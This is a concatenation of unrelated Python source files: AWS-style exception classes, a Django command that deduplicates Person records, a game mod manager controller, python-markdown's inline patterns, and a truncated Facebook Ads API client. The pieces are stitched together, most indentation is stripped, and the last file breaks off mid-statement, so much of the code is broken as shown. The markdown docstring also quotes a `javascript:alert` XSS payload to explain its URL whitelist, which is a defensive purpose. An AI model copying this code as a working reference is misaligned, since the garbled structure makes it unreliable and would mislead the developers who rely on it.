class ResumableDownloadException(Exception):
"""
Exception raised for various resumable download problems.
self.disposition is of type ResumableTransferDisposition.
"""
def __init__(self, message, disposition):
Exception.__init__(self, message, disposition)
self.message = message
self.disposition = disposition
def __repr__(self):
return 'ResumableDownloadException("%s", %s)' % (
self.message, self.disposition)
class TooManyRecordsException(Exception):
"""
Exception raised when a search of Route53 records returns more
records than requested.
"""
def __init__(self, message):
Exception.__init__(self, message)
self.message = message
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand
from core.models import (
Person, Person2Company, Person2Country, Person2Person, Declaration)
from core.utils import ceil_date
from tasks.models import PersonDeduplication, AdHocMatch
from django.db import connection
FIELDS_TO_CONCATENATE = [
"reputation_assets_en",
"reputation_sanctions_en",
"reputation_crimes_en",
"reputation_manhunt_en",
"reputation_convictions_en",
"wiki_en",
"reputation_assets_uk",
"reputation_sanctions_uk",
"reputation_crimes_uk",
"reputation_manhunt_uk",
"reputation_convictions_uk",
"wiki_uk",
"also_known_as_uk",
"also_known_as_en",
]
FIELDS_TO_UPDATE = [
"is_pep",
"photo",
"dob",
"city_of_birth_uk",
"city_of_birth_en",
]
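# A sketch of the merge semantics applied below (hypothetical values):
# fields in FIELDS_TO_CONCATENATE are appended onto the surviving record,
# fields in FIELDS_TO_UPDATE only fill gaps:
#
#     master.wiki_en = 'Known PEP.'
#     donor.wiki_en = 'Owns assets abroad.'
#     # after merge: master.wiki_en == 'Known PEP. Owns assets abroad.'
#
#     master.dob, donor.dob = None, date(1970, 1, 1)
#     # after merge: master.dob == date(1970, 1, 1)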
class Command(BaseCommand):
    help = ('Takes finished person deduplication tasks and applies them '
            'to the Person model')
def add_arguments(self, parser):
# Named (optional) arguments
parser.add_argument(
'--real_run',
action='store_true',
dest='real_run',
default=False,
help='Apply deduplication results for real',
)
def handle(self, *args, **options):
def _fetch_person(task, pk):
try:
return Person.objects.get(pk=pk)
except Person.DoesNotExist:
self.stderr.write(
"\tperson with id {} doesn't exist, skipping".format(pk)
)
return None
def _delete_person(task, pk):
person = _fetch_person(task, pk)
if person:
self.stdout.write(
"\tdeleting person {} with id {}, imported={}".format(
person.full_name, person.pk, person.imported)
)
if options["real_run"]:
person.delete()
cursor = connection.cursor()
for task in PersonDeduplication.objects.filter(
applied=False).exclude(status="p"):
self.stdout.write("Task #{}:".format(task.pk))
if task.status == "a":
self.stdout.write("\tskipping")
if task.status in ["d1", "dd"]:
if task.status == "d1":
self.stdout.write(
"\tkeeping {}".format(
task.person2_id)
)
_delete_person(task, task.person1_id)
if task.status in ["d2", "dd"]:
if task.status == "d2":
self.stdout.write(
"\tkeeping {}".format(
task.person1_id)
)
_delete_person(task, task.person2_id)
if task.status == "m":
person1 = _fetch_person(task, max(task.person1_id, task.person2_id))
person2 = _fetch_person(task, min(task.person1_id, task.person2_id))
if person1 is None or person2 is None:
continue
# Round 1: fight:
if len(person1.full_name) > len(person2.full_name):
master = person1
donor = person2
self.stdout.write("\tpreferring {} over {}".format(
person1.full_name, person2.full_name))
else:
master = person2
donor = person1
self.stdout.write("\tpreferring {} over {}".format(
person2.full_name, person1.full_name))
                # Transferring data fields
# Those to concatenate
for field in FIELDS_TO_CONCATENATE:
donor_val = getattr(donor, field)
master_val = getattr(master, field)
if donor_val and donor_val.strip():
setattr(master, field, ((master_val or "") + " " + donor_val).strip())
self.stdout.write("\tconcatenating content of {}".format(
field))
# Those to overwrite
for field in FIELDS_TO_UPDATE:
donor_val = getattr(donor, field)
master_val = getattr(master, field)
if donor_val and not master_val:
setattr(master, field, donor_val)
self.stdout.write("\treplacing content of {}".format(
field))
                    # Corner case: a donor with a more precise date of birth
                    # wins even when both records have one. Log before the
                    # assignment so the old and new values print correctly.
                    if field == "dob":
                        if donor_val and master_val and (
                                donor.dob_details < master.dob_details):
                            self.stdout.write(
                                "\timproving content of {} (replacing {} with {})".format(
                                    field, master.dob, donor.dob))
                            master.dob = donor.dob
                            master.dob_details = donor.dob_details
                if (donor.reason_of_termination is None and
                        master.reason_of_termination is not None and
                        master.reason_of_termination != 1):
                    master.reason_of_termination = None
                    master.termination_date = None
                    master.termination_date_details = 0
                    self.stdout.write(
                        "\tResurrecting person as a pep, because donor "
                        "has no termination date")
if donor.type_of_official != master.type_of_official:
self.stdout.write("\tSwitching pep level to {}".format(
donor.type_of_official))
master.type_of_official = donor.type_of_official
                elif (donor.reason_of_termination is not None and
                        master.reason_of_termination is not None):
                    if (ceil_date(donor.termination_date,
                                  donor.termination_date_details) >
                            ceil_date(master.termination_date,
                                      master.termination_date_details)):
                        self.stdout.write(
                            "\tUpdating termination date from {} to {} for a person".format(
                                ceil_date(master.termination_date,
                                          master.termination_date_details),
                                ceil_date(donor.termination_date,
                                          donor.termination_date_details)
                            ))
                        master.termination_date = donor.termination_date
                        master.termination_date_details = \
                            donor.termination_date_details
elif donor.reason_of_termination is None and master.reason_of_termination is None:
# Another corner case:
if donor.type_of_official < master.type_of_official:
self.stdout.write("\tUpgrading pep level to {}".format(
donor.type_of_official))
master.type_of_official = donor.type_of_official
if options["real_run"]:
master.save()
# Merging relations with companies
for p2c in Person2Company.objects.filter(
from_person_id=donor.pk):
self.stdout.write("\tchanging link {}".format(p2c))
if options["real_run"]:
p2c.from_person = master
p2c.save()
# Merging relations with countries
for p2c in Person2Country.objects.filter(
from_person_id=donor.pk):
self.stdout.write("\tchanging link {}".format(p2c))
if options["real_run"]:
p2c.from_person = master
p2c.save()
# Merging relations with other persons
for p2p in Person2Person.objects.filter(
from_person_id=donor.pk):
self.stdout.write("\tchanging link {}".format(p2p))
if options["real_run"]:
p2p.from_person_id = master.pk
p2p.save()
for p2p in Person2Person.objects.filter(
to_person_id=donor.pk):
self.stdout.write("\tchanging link {}".format(p2p))
if options["real_run"]:
p2p.to_person_id = master.pk
p2p.save()
# Merging declarations
for decl in Declaration.objects.filter(
person=donor.pk):
if Declaration.objects.filter(
person=master.pk,
declaration_id=decl.declaration_id).count() == 0:
self.stdout.write(
"\tswitching declaration {}".format(decl))
if options["real_run"]:
decl.person = master
decl.save()
                    else:
                        self.stdout.write(
                            "\tnot switching declaration {}, deleting it".format(decl))
                        if options["real_run"]:
                            decl.delete()
# TODO: Move also DeclarationExtra
                self.stdout.write(
                    "\tkeeping {} with id {}".format(
                        master.full_name, master.pk)
                )
                self.stdout.write(
                    "\tdeleting {} with id {}, imported={}".format(
                        donor.full_name, donor.pk, donor.imported)
                )
if options["real_run"]:
AdHocMatch.objects.filter(person=donor).update(person=None)
# Kill the donor!
                    # Raw SQL, because otherwise Django would also delete the
                    # donor person's old connections, which are stuck for some
                    # reason.
cursor.execute(
"DELETE from core_person WHERE id=%s", [donor.pk]
)
if options["real_run"]:
task.applied = True
task.save()
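# Illustrative invocation (the actual command name comes from this file's
# name under management/commands/, which isn't shown here):
#   python manage.py <command_name>             # dry run: only logs planned changes
#   python manage.py <command_name> --real_run  # actually applies merges and deletes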
|
|
import sys
import os
from modPackager import ModPackager
from modManagerModel import ModManagerModel
from modManagerView import (ModManagerView, NOMODSELECTED, MODSELECTED,
EDITMOD, NEWMOD, NORMALMODES, EDITINGMODES)
class ModManagerController:
def __init__(self):
self.domain = "https://api.kag2d.com/v1"
if hasattr(sys, 'frozen'):
self.runPath = os.path.split(sys.executable)[0]
else:
self.runPath = os.path.split(sys.argv[0])[0]
if os.path.isfile(self.runPath):
self.runPath = os.path.dirname(self.runPath)
self.model = ModManagerModel(self.domain)
        self.view = ModManagerView(self, self.runPath)
def get_mod_devinfo(self, username, password, developer, modname):
code, modInfo = self.model.get_mod_devinfo(username, password, developer, modname)
if code == 200:
self.view.write_log("Mod private info fetched")
self.view.set_currentMod(modInfo)
self.view.set_infofields(modInfo)
else:
self.view.write_log("Fetching mod private info failed. Reason: {reason}"
.format(reason=modInfo))
return code, modInfo
def refresh_mod_list(self):
filters, activeFilters = self.view.get_filters()
self.view.write_log("Refreshing mod list. Active filters: {filters}"
.format(filters=activeFilters))
code, modList = self.model.get_mod_list(filters)
if code == 200:
self.view.write_log("Mod list refreshed. Mods found: {mods}"
.format(mods=len(modList)))
self.view.refresh_mod_list(modList)
else:
self.view.write_log("Mod list refresh failed. Reason: {reason}"
.format(reason=modList['statusMessage']))
def new_mod(self):
username, password = self.view.dev_credentials_check("create a new mod")
if username is None:
return
self.view.new_mod()
def edit_mod(self):
username, password = self.view.dev_credentials_check("edit a mod")
if username is None:
return
code, mod = self.get_mod_devinfo(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code != 200:
return
self.view.edit_mod()
def submit(self):
username, password = self.view.dev_credentials_check("submit a mod")
if username is None:
return
if not self.view.submit_requiredfieldscheck():
return
name = self.view.get_mod_name()
nameURL = self.view.get_mod_nameURL()
developer = self.view.get_mod_developer()
devType = self.view.get_devType()
description = self.view.get_mod_description()
ownerList = self.view.get_mod_ownerList()
devList = self.view.get_mod_devList()
fullRestricted = self.view.get_mod_fullRestricted()
serverRestricted = self.view.get_mod_serverRestricted()
clientRestricted = self.view.get_mod_clientRestricted()
if self.view.get_viewState() == NEWMOD:
code, _ = self.model.get_mod_info(developer, nameURL)
if code != 404:
self.view.write_log("A mod with this developer and name URL already exists, please try another name URL")
return
code, message = self.model.put_mod_info(username, password,
developer=developer, devType=devType,
nameURL=nameURL, name=name, desc=description,
fullRestrict=fullRestricted,
clientRestrict=clientRestricted,
serverRestrict=serverRestricted,
ownerList=ownerList, devAccessList=devList)
if code == 200:
self.view.write_log("Mod data submitted successfully")
self.view.finish_editing()
else:
self.view.write_log("Mod data submission failed. Reason: {reason}"
.format(reason=message))
def cancel(self):
self.view.finish_editing()
def delete_mod(self):
username, password = self.view.dev_credentials_check("delete a mod")
if username is None:
return
code, message = self.model.delete_mod(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code == 200:
self.view.write_log("Mod deletion successful")
self.view.finish_editing()
else:
self.view.write_log("Mod deletion failed. Reason: {reason}"
.format(reason=message))
def fetch_dev_key(self):
username, password = self.view.dev_credentials_check("fetch mod developer key")
if username is None:
return 0, None
self.view.write_log("Fetching mod developer key")
code, devkey = self.model.get_mod_devkey(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code == 200:
self.view.write_log("Mod developer key fetched")
self.view.set_devkey(devkey)
else:
self.view.write_log("Fetching mod developer key failed. Reason: {reason}"
.format(reason=devkey))
return code, devkey
def reg_generate(self):
action = "generate a mod registration file"
username, password = self.view.dev_credentials_check(action)
if username is None:
return
if not self.view.modfolderrequiredcheck(action):
return
folderPath = self.view.get_mod_folder()
self.view.write_log("Generating mod registration file... First acquiring current mod info and devkey")
code, mod = self.get_mod_devinfo(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code != 200:
self.view.write_log("Mod registration file generation failed")
return
code, devkey = self.fetch_dev_key()
if code != 200:
self.view.write_log("Mod registration file generation failed")
return
self.view.write_log("Hashing mod files and generating registration file")
ModPackager.generate_regfile(folderPath, mod, devkey)
self.view.write_log("Successfully generated mod registration file")
def upload_mod(self):
action = "upload a mod package"
username, password = self.view.dev_credentials_check(action)
if username is None:
return
if not self.view.modfolderrequiredcheck(action):
return
folderPath = self.view.get_mod_folder()
self.view.write_log("Uploading mod... First acquiring current mod info and devkey")
code, modInfo = self.get_mod_devinfo(username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code != 200:
self.view.write_log("Mod upload failed")
return
code, devkey = self.fetch_dev_key()
if code != 200:
self.view.write_log("Mod upload failed")
return
self.view.write_log("Generating mod package for upload")
tempPath = os.path.join(self.runPath, 'temp')
modTar = ModPackager.package_mod_for_upload(folderPath, tempPath,
modInfo, devkey)
self.view.write_log("Successfully generated mod package")
code, message = self.model.put_mod_package(modTar, username, password,
self.view.get_mod_developer(),
self.view.get_mod_nameURL())
if code == 200:
self.view.write_log("Successfully uploaded mod")
self.view.finish_upload()
else:
self.view.write_log("Mod upload failed. Reason: {reason}".format(reason=message))
def download_mod(self):
fullRestricted = self.view.get_mod_fullRestricted()
if fullRestricted:
username, password = self.view.dev_credentials_check("download this full mod package (it is restricted to devs only)")
if username is None:
return
else:
username = password = None
dlPath = self.view.get_download_folder()
dev = self.view.get_mod_developer()
modname = self.view.get_mod_nameURL()
self.view.write_log("Downloading mod package")
code, message = self.model.get_mod_package(dlPath, dev, modname,
fullRestricted, username, password)
if code == 200:
self.view.write_log("Successfully downloaded mod, extracting now")
modFile = os.path.join(dlPath, '{name}.tar'.format(name=modname))
extractPath = os.path.join(dlPath, '{name}'.format(name=modname))
try:
ModPackager.extract_mod(modFile, extractPath)
self.view.write_log("Successfully extracted mod")
            except Exception as ex:
self.view.write_log("Mod extraction failed: {e}".format(e=ex))
else:
self.view.write_log("Mod download failed. Reason: {reason}".format(reason=message))
client = ModManagerController()
|
|
"""
INLINE PATTERNS
=============================================================================
Inline patterns such as *emphasis* are handled by means of auxiliary
objects, one per pattern. Pattern objects must be instances of classes
that extend markdown.Pattern. Each pattern object uses a single regular
expression and needs to support the following methods:
pattern.getCompiledRegExp() # returns a regular expression
pattern.handleMatch(m) # takes a match object and returns
# an ElementTree element or just plain text
All of python markdown's built-in patterns subclass from Pattern,
but you can add additional patterns that don't.
Also note that all the regular expressions used by inline patterns must
capture the whole block. For this reason, they all start with
'^(.*?)' and end with '(.*)$'. For the built-in expressions, the
Pattern base class takes care of adding the '^(.*?)' and '(.*)$'.
Finally, the order in which regular expressions are applied is very
important - e.g. if we first replace http://.../ links with <a> tags
and _then_ try to replace inline html, we would end up with a mess.
So, we apply the expressions in the following order:
* escape and backticks have to go before everything else, so
that we can preempt any markdown patterns by escaping them.
* then we handle auto-links (must be done before inline html)
* then we handle inline HTML. At this point we will simply
replace all inline HTML strings with a placeholder and add
the actual HTML to a hash.
* then inline images (must be done before links)
* then bracketed links, first regular then reference-style
* finally we apply strong and emphasis
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from . import util
from . import odict
import re
try: # pragma: no cover
from urllib.parse import urlparse, urlunparse
except ImportError: # pragma: no cover
from urlparse import urlparse, urlunparse
try: # pragma: no cover
from html import entities
except ImportError: # pragma: no cover
import htmlentitydefs as entities
def build_inlinepatterns(md_instance, **kwargs):
""" Build the default set of inline patterns for Markdown. """
inlinePatterns = odict.OrderedDict()
inlinePatterns["backtick"] = BacktickPattern(BACKTICK_RE)
inlinePatterns["escape"] = EscapePattern(ESCAPE_RE, md_instance)
inlinePatterns["reference"] = ReferencePattern(REFERENCE_RE, md_instance)
inlinePatterns["link"] = LinkPattern(LINK_RE, md_instance)
inlinePatterns["image_link"] = ImagePattern(IMAGE_LINK_RE, md_instance)
inlinePatterns["image_reference"] = ImageReferencePattern(
IMAGE_REFERENCE_RE, md_instance
)
inlinePatterns["short_reference"] = ReferencePattern(
SHORT_REF_RE, md_instance
)
inlinePatterns["autolink"] = AutolinkPattern(AUTOLINK_RE, md_instance)
inlinePatterns["automail"] = AutomailPattern(AUTOMAIL_RE, md_instance)
inlinePatterns["linebreak"] = SubstituteTagPattern(LINE_BREAK_RE, 'br')
if md_instance.safeMode != 'escape':
inlinePatterns["html"] = HtmlPattern(HTML_RE, md_instance)
inlinePatterns["entity"] = HtmlPattern(ENTITY_RE, md_instance)
inlinePatterns["not_strong"] = SimpleTextPattern(NOT_STRONG_RE)
inlinePatterns["em_strong"] = DoubleTagPattern(EM_STRONG_RE, 'strong,em')
inlinePatterns["strong_em"] = DoubleTagPattern(STRONG_EM_RE, 'em,strong')
inlinePatterns["strong"] = SimpleTagPattern(STRONG_RE, 'strong')
inlinePatterns["emphasis"] = SimpleTagPattern(EMPHASIS_RE, 'em')
if md_instance.smart_emphasis:
inlinePatterns["emphasis2"] = SimpleTagPattern(SMART_EMPHASIS_RE, 'em')
else:
inlinePatterns["emphasis2"] = SimpleTagPattern(EMPHASIS_2_RE, 'em')
return inlinePatterns
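# A sketch of registering an extra inline pattern on a Markdown instance, as
# the module docstring describes (the "--deleted--" syntax and the priority
# position are illustrative choices, not built into this module):
#
#     DEL_RE = r'(--)(.+?)\2'
#     md.inlinePatterns.add('del', SimpleTagPattern(DEL_RE, 'del'),
#                           '<not_strong')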
"""
The actual regular expressions for patterns
-----------------------------------------------------------------------------
"""
NOBRACKET = r'[^\]\[]*'
BRK = (
r'\[(' +
(NOBRACKET + r'(\[')*6 +
(NOBRACKET + r'\])*')*6 +
NOBRACKET + r')\]'
)
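# BRK above matches link text containing up to six levels of nested
# square brackets (hence the six-fold repetition in its construction).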
NOIMG = r'(?<!\!)'
# `e=f()` or ``e=f("`")``
BACKTICK_RE = r'(?<!\\)(`+)(.+?)(?<!`)\2(?!`)'
# \<
ESCAPE_RE = r'\\(.)'
# *emphasis*
EMPHASIS_RE = r'(\*)([^\*]+)\2'
# **strong**
STRONG_RE = r'(\*{2}|_{2})(.+?)\2'
# ***strongem*** or ***em*strong**
EM_STRONG_RE = r'(\*|_)\2{2}(.+?)\2(.*?)\2{2}'
# ***strong**em*
STRONG_EM_RE = r'(\*|_)\2{2}(.+?)\2{2}(.*?)\2'
# _smart_emphasis_
SMART_EMPHASIS_RE = r'(?<!\w)(_)(?!_)(.+?)(?<!_)\2(?!\w)'
# _emphasis_
EMPHASIS_2_RE = r'(_)(.+?)\2'
# [text](url) or [text](<url>) or [text](url "title")
LINK_RE = NOIMG + BRK + \
r'''\(\s*(<.*?>|((?:(?:\(.*?\))|[^\(\)]))*?)\s*((['"])(.*?)\12\s*)?\)'''
#  or 
IMAGE_LINK_RE = r'\!' + BRK + r'\s*\(\s*(<.*?>|([^"\)\s]+\s*"[^"]*"|[^\)\s]*))\s*\)'
# [Google][3]
REFERENCE_RE = NOIMG + BRK + r'\s?\[([^\]]*)\]'
# [Google]
SHORT_REF_RE = NOIMG + r'\[([^\]]+)\]'
# ![alt text][2]
IMAGE_REFERENCE_RE = r'\!' + BRK + r'\s?\[([^\]]*)\]'
# stand-alone * or _
NOT_STRONG_RE = r'((^| )(\*|_)( |$))'
# <http://www.123.com>
AUTOLINK_RE = r'<((?:[Ff]|[Hh][Tt])[Tt][Pp][Ss]?://[^>]*)>'
# <me@example.com>
AUTOMAIL_RE = r'<([^> \!]*@[^> ]*)>'
# <...>
HTML_RE = r'(\<([a-zA-Z/][^\>]*?|\!--.*?--)\>)'
# &
ENTITY_RE = r'(&[\#a-zA-Z0-9]*;)'
# two spaces at end of line
LINE_BREAK_RE = r' \n'
def dequote(string):
"""Remove quotes from around a string."""
if ((string.startswith('"') and string.endswith('"')) or
(string.startswith("'") and string.endswith("'"))):
return string[1:-1]
else:
return string
ATTR_RE = re.compile("\{@([^\}]*)=([^\}]*)}") # {@id=123}
def handleAttributes(text, parent):
"""Set values of an element based on attribute definitions ({@id=123})."""
def attributeCallback(match):
parent.set(match.group(1), match.group(2).replace('\n', ' '))
return ATTR_RE.sub(attributeCallback, text)
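# For example, handleAttributes('Header {@id=intro}', el) sets el's "id"
# attribute to "intro" and returns 'Header ' with the definition stripped.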
"""
The pattern classes
-----------------------------------------------------------------------------
"""
class Pattern(object):
"""Base class that inline patterns subclass. """
def __init__(self, pattern, markdown_instance=None):
"""
        Create an instance of an inline pattern.
Keyword arguments:
* pattern: A regular expression that matches a pattern
"""
self.pattern = pattern
self.compiled_re = re.compile("^(.*?)%s(.*)$" % pattern,
re.DOTALL | re.UNICODE)
# Api for Markdown to pass safe_mode into instance
self.safe_mode = False
if markdown_instance:
self.markdown = markdown_instance
def getCompiledRegExp(self):
""" Return a compiled regular expression. """
return self.compiled_re
def handleMatch(self, m):
"""Return a ElementTree element from the given match.
Subclasses should override this method.
Keyword arguments:
* m: A re match object containing a match of the pattern.
"""
pass # pragma: no cover
def type(self):
""" Return class name, to define pattern type """
return self.__class__.__name__
def unescape(self, text):
""" Return unescaped text given text with an inline placeholder. """
try:
stash = self.markdown.treeprocessors['inline'].stashed_nodes
except KeyError: # pragma: no cover
return text
def itertext(el): # pragma: no cover
' Reimplement Element.itertext for older python versions '
tag = el.tag
if not isinstance(tag, util.string_type) and tag is not None:
return
if el.text:
yield el.text
for e in el:
for s in itertext(e):
yield s
if e.tail:
yield e.tail
def get_stash(m):
id = m.group(1)
if id in stash:
value = stash.get(id)
if isinstance(value, util.string_type):
return value
else:
# An etree Element - return text content only
return ''.join(itertext(value))
return util.INLINE_PLACEHOLDER_RE.sub(get_stash, text)
class SimpleTextPattern(Pattern):
""" Return a simple text of group(2) of a Pattern. """
def handleMatch(self, m):
return m.group(2)
class EscapePattern(Pattern):
""" Return an escaped character. """
def handleMatch(self, m):
char = m.group(2)
if char in self.markdown.ESCAPED_CHARS:
return '%s%s%s' % (util.STX, ord(char), util.ETX)
else:
return None
class SimpleTagPattern(Pattern):
"""
Return element of type `tag` with a text attribute of group(3)
of a Pattern.
"""
def __init__(self, pattern, tag):
Pattern.__init__(self, pattern)
self.tag = tag
def handleMatch(self, m):
el = util.etree.Element(self.tag)
el.text = m.group(3)
return el
class SubstituteTagPattern(SimpleTagPattern):
""" Return an element of type `tag` with no children. """
def handleMatch(self, m):
return util.etree.Element(self.tag)
class BacktickPattern(Pattern):
""" Return a `<code>` element containing the matching text. """
def __init__(self, pattern):
Pattern.__init__(self, pattern)
self.tag = "code"
def handleMatch(self, m):
el = util.etree.Element(self.tag)
el.text = util.AtomicString(m.group(3).strip())
return el
class DoubleTagPattern(SimpleTagPattern):
"""Return a ElementTree element nested in tag2 nested in tag1.
Useful for strong emphasis etc.
"""
def handleMatch(self, m):
tag1, tag2 = self.tag.split(",")
el1 = util.etree.Element(tag1)
el2 = util.etree.SubElement(el1, tag2)
el2.text = m.group(3)
if len(m.groups()) == 5:
el2.tail = m.group(4)
return el1
class HtmlPattern(Pattern):
""" Store raw inline html and return a placeholder. """
def handleMatch(self, m):
rawhtml = self.unescape(m.group(2))
place_holder = self.markdown.htmlStash.store(rawhtml)
return place_holder
def unescape(self, text):
""" Return unescaped text given text with an inline placeholder. """
try:
stash = self.markdown.treeprocessors['inline'].stashed_nodes
except KeyError: # pragma: no cover
return text
def get_stash(m):
id = m.group(1)
value = stash.get(id)
if value is not None:
try:
return self.markdown.serializer(value)
                except Exception:
                    return '\\%s' % value
return util.INLINE_PLACEHOLDER_RE.sub(get_stash, text)
class LinkPattern(Pattern):
""" Return a link element from the given match. """
def handleMatch(self, m):
el = util.etree.Element("a")
el.text = m.group(2)
title = m.group(13)
href = m.group(9)
if href:
if href[0] == "<":
href = href[1:-1]
el.set("href", self.sanitize_url(self.unescape(href.strip())))
else:
el.set("href", "")
if title:
title = dequote(self.unescape(title))
el.set("title", title)
return el
def sanitize_url(self, url):
"""
Sanitize a url against xss attacks in "safe_mode".
Rather than specifically blacklisting `javascript:alert("XSS")` and all
its aliases (see <http://ha.ckers.org/xss.html>), we whitelist known
safe url formats. Most urls contain a network location, however some
are known not to (i.e.: mailto links). Script urls do not contain a
location. Additionally, for `javascript:...`, the scheme would be
"javascript" but some aliases will appear to `urlparse()` to have no
scheme. On top of that relative links (i.e.: "foo/bar.html") have no
scheme. Therefore we must check "path", "parameters", "query" and
"fragment" for any literal colons. We don't check "scheme" for colons
because it *should* never have any and "netloc" must allow the form:
`username:password@host:port`.
"""
if not self.markdown.safeMode:
            # Return immediately, bypassing parsing.
return url
try:
scheme, netloc, path, params, query, fragment = url = urlparse(url)
except ValueError: # pragma: no cover
# Bad url - so bad it couldn't be parsed.
return ''
locless_schemes = ['', 'mailto', 'news']
allowed_schemes = locless_schemes + ['http', 'https', 'ftp', 'ftps']
if scheme not in allowed_schemes:
# Not a known (allowed) scheme. Not safe.
return ''
if netloc == '' and scheme not in locless_schemes: # pragma: no cover
# This should not happen. Treat as suspect.
return ''
for part in url[2:]:
if ":" in part:
# A colon in "path", "parameters", "query"
# or "fragment" is suspect.
return ''
# Url passes all tests. Return url as-is.
return urlunparse(url)
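        # Illustrative outcomes under safe_mode (examples of the rules in
        # the docstring above, not exercised by the code itself):
        #   'http://example.com/a'   -> returned unchanged (allowed scheme)
        #   'javascript:alert(1)'    -> '' (scheme not in the whitelist)
        #   'foo/bar.html#a:b'       -> '' (literal colon in the fragment)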
class ImagePattern(LinkPattern):
""" Return a img element from the given match. """
def handleMatch(self, m):
el = util.etree.Element("img")
src_parts = m.group(9).split()
if src_parts:
src = src_parts[0]
if src[0] == "<" and src[-1] == ">":
src = src[1:-1]
el.set('src', self.sanitize_url(self.unescape(src)))
else:
el.set('src', "")
if len(src_parts) > 1:
el.set('title', dequote(self.unescape(" ".join(src_parts[1:]))))
if self.markdown.enable_attributes:
truealt = handleAttributes(m.group(2), el)
else:
truealt = m.group(2)
el.set('alt', self.unescape(truealt))
return el
class ReferencePattern(LinkPattern):
""" Match to a stored reference and return link element. """
NEWLINE_CLEANUP_RE = re.compile(r'[ ]?\n', re.MULTILINE)
def handleMatch(self, m):
try:
id = m.group(9).lower()
except IndexError:
id = None
if not id:
# if we got something like "[Google][]" or "[Goggle]"
# we'll use "google" as the id
id = m.group(2).lower()
# Clean up linebreaks in id
id = self.NEWLINE_CLEANUP_RE.sub(' ', id)
if id not in self.markdown.references: # ignore undefined refs
return None
href, title = self.markdown.references[id]
text = m.group(2)
return self.makeTag(href, title, text)
def makeTag(self, href, title, text):
el = util.etree.Element('a')
el.set('href', self.sanitize_url(href))
if title:
el.set('title', title)
el.text = text
return el
class ImageReferencePattern(ReferencePattern):
""" Match to a stored reference and return img element. """
def makeTag(self, href, title, text):
el = util.etree.Element("img")
el.set("src", self.sanitize_url(href))
if title:
el.set("title", title)
if self.markdown.enable_attributes:
text = handleAttributes(text, el)
el.set("alt", self.unescape(text))
return el
class AutolinkPattern(Pattern):
""" Return a link Element given an autolink (`<http://example/com>`). """
def handleMatch(self, m):
el = util.etree.Element("a")
el.set('href', self.unescape(m.group(2)))
el.text = util.AtomicString(m.group(2))
return el
class AutomailPattern(Pattern):
"""
Return a mailto link Element given an automail link (`<foo@example.com>`).
"""
def handleMatch(self, m):
el = util.etree.Element('a')
email = self.unescape(m.group(2))
if email.startswith("mailto:"):
email = email[len("mailto:"):]
def codepoint2name(code):
"""Return entity definition by code, or the code if not defined."""
entity = entities.codepoint2name.get(code)
if entity:
return "%s%s;" % (util.AMP_SUBSTITUTE, entity)
else:
return "%s#%d;" % (util.AMP_SUBSTITUTE, code)
letters = [codepoint2name(ord(letter)) for letter in email]
el.text = util.AtomicString(''.join(letters))
mailto = "mailto:" + email
mailto = "".join([util.AMP_SUBSTITUTE + '#%d;' %
ord(letter) for letter in mailto])
el.set('href', mailto)
return el
|
|
import codecs
import calendar
import datetime
import io
import json
import logging
import mimetypes
import sys
import urllib
import urllib2
import uuid
FACEBOOK_API = 'https://graph.facebook.com'
logger = logging.getLogger(__name__)
class MultipartFormdataEncoder(object):
def __init__(self):
self.boundary = uuid.uuid4().hex
self.content_type = 'multipart/form-data; boundary={}'.format(
self.boundary)
@classmethod
def u(cls, s):
if sys.hexversion < 0x03000000 and isinstance(s, str):
s = s.decode('utf-8')
if sys.hexversion >= 0x03000000 and isinstance(s, bytes):
s = s.decode('utf-8')
return s
def iter(self, fields, files):
"""
fields is a sequence of (name, value) elements for regular form fields.
files is a sequence of (name, file-like) elements for data
to be uploaded as files.
Yield body's chunk as bytes
"""
encoder = codecs.getencoder('utf-8')
for key, value in fields.iteritems():
key = self.u(key)
yield encoder('--{}\r\n'.format(self.boundary))
yield encoder(self.u(
'Content-Disposition: form-data; name="{}"\r\n').format(key))
yield encoder('\r\n')
if isinstance(value, int) or isinstance(value, float):
value = str(value)
yield encoder(self.u(value))
yield encoder('\r\n')
for key, value in files.iteritems():
key = self.u(key)
filename = self.u(value.name)
yield encoder('--{}\r\n'.format(self.boundary))
yield encoder(self.u('Content-Disposition: form-data; name="{}"; filename="{}"\r\n').format(key, filename))
yield encoder('Content-Type: {}\r\n'.format(mimetypes.guess_type(filename)[0] or 'application/octet-stream'))
yield encoder('\r\n')
buff = value.read()
yield (buff, len(buff))
yield encoder('\r\n')
        yield encoder('--{}--\r\n'.format(self.boundary))
def encode(self, fields, files):
body = io.BytesIO()
for chunk, chunk_len in self.iter(fields, files):
body.write(chunk)
return self.content_type, body.getvalue()
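# Illustrative usage (the file name and field values are placeholders):
#   encoder = MultipartFormdataEncoder()
#   with open('ad_image.png', 'rb') as image:
#       content_type, body = encoder.encode({'name': 'My image'},
#                                           {'filename': image})
#   req = urllib2.Request(url, data=body)
#   req.add_header('Content-Type', content_type)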
class AdsAPIError(Exception):
"""
Errors as defined in the Facebook documentation
https://developers.facebook.com/docs/reference/ads-api/error-reference/
"""
def __init__(self, error):
try:
self.error = json.load(error)
        except Exception:
self.message = '{}'.format(error)
self.code = None
self.type = None
self.str = self.message
self.error = {'message': self.message}
else:
error_dict = self.error.get('error', {})
self.message = error_dict.get('message', '')
# New error details in api 2.2
if 'error_user_title' in error_dict:
self.message += ' - ' + error_dict['error_user_title']
if 'error_user_msg' in error_dict:
self.message += ' - ' + error_dict['error_user_msg']
self.code = self.error.get('error', {}).get('code')
self.type = self.error.get('error', {}).get('type')
self.str = '(%s %s) %s' % (self.type, self.code, self.message)
def __str__(self):
return self.str
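# Illustrative error handling around any of the client calls below (the
# account id is a placeholder):
#   try:
#       api.get_adaccount('1234567890', ['currency'])
#   except AdsAPIError as e:
#       logger.info('FB error %s (%s): %s', e.code, e.type, e.message)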
class AdsAPI(object):
"""A client for the Facebook Ads API."""
DATA_LIMIT = 1000
def __init__(self, access_token, app_id='', app_secret='', version=None):
"""
:param access_token: The API access token
        :param app_id: An optional App id, currently only used for debug_token.
:param app_secret: An optional App secret, currently only used for debug_token
:param version: Facebook API version, e.g. "2.2". It's currently optional but will be required soon.
"""
self.access_token = access_token
self.app_id = app_id
self.app_secret = app_secret
if version:
